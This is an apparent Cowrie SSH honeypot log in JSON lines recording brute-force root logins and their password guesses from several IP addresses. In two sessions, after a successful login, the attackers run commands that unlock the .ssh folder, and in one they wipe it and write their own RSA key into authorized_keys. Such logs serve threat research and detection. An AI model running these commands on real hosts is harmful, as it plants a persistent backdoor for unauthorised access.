{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T13:26:57.294877Z","src_ip":"212.227.235.229","session":"ae43759f0b2d"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:26:57.772271Z","src_ip":"212.227.235.229","session":"ae43759f0b2d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T13:26:57.933025Z","session":"ae43759f0b2d"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":36356,"dst_ip":"1.2.3.4","dst_port":22,"session":"b37fefec4a76","protocol":"ssh","message":"New connection: 167.99.49.89:36356 (1.2.3.4:22) [session: b37fefec4a76]","sensor":"my-vps","timestamp":"2025-08-26T13:27:07.552630Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:27:07.553455Z","src_ip":"167.99.49.89","session":"b37fefec4a76"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:27:07.645237Z","src_ip":"167.99.49.89","session":"b37fefec4a76"}
{"eventid":"cowrie.login.success","username":"root","password":"qwer12345","message":"login attempt [root/qwer12345] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:27:08.053240Z","src_ip":"167.99.49.89","session":"b37fefec4a76"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:27:08.302896Z","src_ip":"167.99.49.89","session":"b37fefec4a76"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:27:08.303567Z","src_ip":"167.99.49.89","session":"b37fefec4a76"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:27:08.304662Z","src_ip":"167.99.49.89","session":"b37fefec4a76"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:27:08.397582Z","src_ip":"167.99.49.89","session":"b37fefec4a76"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:27:08.600962Z","src_ip":"167.99.49.89","session":"b37fefec4a76"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:27:08.601721Z","src_ip":"167.99.49.89","session":"b37fefec4a76"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:27:08.696084Z","src_ip":"167.99.49.89","session":"b37fefec4a76"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:27:08.696969Z","src_ip":"167.99.49.89","session":"b37fefec4a76"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":36360,"dst_ip":"1.2.3.4","dst_port":22,"session":"108ea5c156fa","protocol":"ssh","message":"New connection: 167.99.49.89:36360 (1.2.3.4:22) [session: 108ea5c156fa]","sensor":"my-vps","timestamp":"2025-08-26T13:27:08.784436Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:27:08.785091Z","src_ip":"167.99.49.89","session":"108ea5c156fa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:27:08.874978Z","src_ip":"167.99.49.89","session":"108ea5c156fa"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:27:09.278153Z","src_ip":"167.99.49.89","session":"108ea5c156fa"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:27:10.371135Z","src_ip":"167.99.49.89","session":"108ea5c156fa"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":36376,"dst_ip":"1.2.3.4","dst_port":22,"session":"1f741776fb50","protocol":"ssh","message":"New connection: 167.99.49.89:36376 (1.2.3.4:22) [session: 1f741776fb50]","sensor":"my-vps","timestamp":"2025-08-26T13:27:10.459853Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:27:10.461209Z","src_ip":"167.99.49.89","session":"1f741776fb50"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:27:10.550868Z","src_ip":"167.99.49.89","session":"1f741776fb50"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:27:10.948554Z","src_ip":"167.99.49.89","session":"1f741776fb50"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:27:11.040679Z","src_ip":"167.99.49.89","session":"1f741776fb50"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:27:11.041665Z","src_ip":"167.99.49.89","session":"b37fefec4a76"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:27:40.175100Z","src_ip":"212.227.235.229","session":"83150aae7b81"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43132,"dst_ip":"1.2.3.4","dst_port":22,"session":"2716b027b5d3","protocol":"ssh","message":"New connection: 212.227.235.229:43132 (1.2.3.4:22) [session: 2716b027b5d3]","sensor":"my-vps","timestamp":"2025-08-26T13:27:46.808723Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:27:46.809798Z","src_ip":"212.227.235.229","session":"2716b027b5d3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:27:47.055487Z","src_ip":"212.227.235.229","session":"2716b027b5d3"}
{"eventid":"cowrie.login.failed","username":"popuser","password":"popuser","message":"login attempt [popuser/popuser] failed","sensor":"my-vps","timestamp":"2025-08-26T13:27:48.110916Z","src_ip":"212.227.235.229","session":"2716b027b5d3"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:27:49.353441Z","src_ip":"212.227.235.229","session":"2716b027b5d3"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:28:07.135558Z","src_ip":"212.227.235.229","session":"ae43759f0b2d"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":43474,"dst_ip":"1.2.3.4","dst_port":22,"session":"b309f99efc8b","protocol":"ssh","message":"New connection: 167.99.49.89:43474 (1.2.3.4:22) [session: b309f99efc8b]","sensor":"my-vps","timestamp":"2025-08-26T13:28:10.183869Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:28:10.185470Z","src_ip":"167.99.49.89","session":"b309f99efc8b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:28:10.276204Z","src_ip":"167.99.49.89","session":"b309f99efc8b"}
{"eventid":"cowrie.login.failed","username":"user3","password":"user3","message":"login attempt [user3/user3] failed","sensor":"my-vps","timestamp":"2025-08-26T13:28:10.641638Z","src_ip":"167.99.49.89","session":"b309f99efc8b"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:28:11.735744Z","src_ip":"167.99.49.89","session":"b309f99efc8b"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":55194,"dst_ip":"1.2.3.4","dst_port":22,"session":"040012f9816c","protocol":"ssh","message":"New connection: 167.99.49.89:55194 (1.2.3.4:22) [session: 040012f9816c]","sensor":"my-vps","timestamp":"2025-08-26T13:29:12.053248Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:29:12.054877Z","src_ip":"167.99.49.89","session":"040012f9816c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:29:12.145441Z","src_ip":"167.99.49.89","session":"040012f9816c"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"dspace2023","message":"login attempt [dspace/dspace2023] failed","sensor":"my-vps","timestamp":"2025-08-26T13:29:12.507198Z","src_ip":"167.99.49.89","session":"040012f9816c"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:29:13.599930Z","src_ip":"167.99.49.89","session":"040012f9816c"}
{"eventid":"cowrie.session.connect","src_ip":"113.141.82.238","src_port":43544,"dst_ip":"1.2.3.4","dst_port":22,"session":"48ccb77faee6","protocol":"ssh","message":"New connection: 113.141.82.238:43544 (1.2.3.4:22) [session: 48ccb77faee6]","sensor":"my-vps","timestamp":"2025-08-26T13:29:33.524644Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:29:33.525877Z","src_ip":"113.141.82.238","session":"48ccb77faee6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:29:37.301913Z","src_ip":"113.141.82.238","session":"48ccb77faee6"}
{"eventid":"cowrie.login.success","username":"root","password":"Welcome01","message":"login attempt [root/Welcome01] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:29:38.028483Z","src_ip":"113.141.82.238","session":"48ccb77faee6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:29:38.593720Z","src_ip":"113.141.82.238","session":"48ccb77faee6"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:29:38.594744Z","src_ip":"113.141.82.238","session":"48ccb77faee6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:29:38.596101Z","src_ip":"113.141.82.238","session":"48ccb77faee6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:29:38.837194Z","src_ip":"113.141.82.238","session":"48ccb77faee6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:29:39.340683Z","src_ip":"113.141.82.238","session":"48ccb77faee6"}
